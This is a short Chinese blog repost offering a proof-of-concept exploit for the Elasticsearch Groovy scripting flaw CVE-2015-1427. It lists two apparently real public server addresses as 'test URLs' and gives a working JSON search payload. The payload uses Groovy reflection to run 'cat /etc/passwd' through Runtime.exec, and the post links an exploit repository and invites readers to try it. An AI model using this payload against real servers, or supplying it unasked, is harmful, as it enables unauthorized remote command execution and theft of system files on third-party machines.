Elasticsearch Groovy任意命令执行漏洞EXP

mac2022-06-30  26

感谢:@lupin 的分析(Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)) 本exp不一定正确,测试的站太少了,大家去测试测试。 测试url:http://190.196.67.252:9200/_search?pretty http://191.234.18.14:9200///_search?pretty {"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

 

 

EXP:https://github.com/Svti/ElasticSearchEXP/

 

转载自乌云zone

转载于:https://www.cnblogs.com/Le30bjectNs11/p/4317559.html

相关资源:垃圾分类数据集及代码
最新回复(0)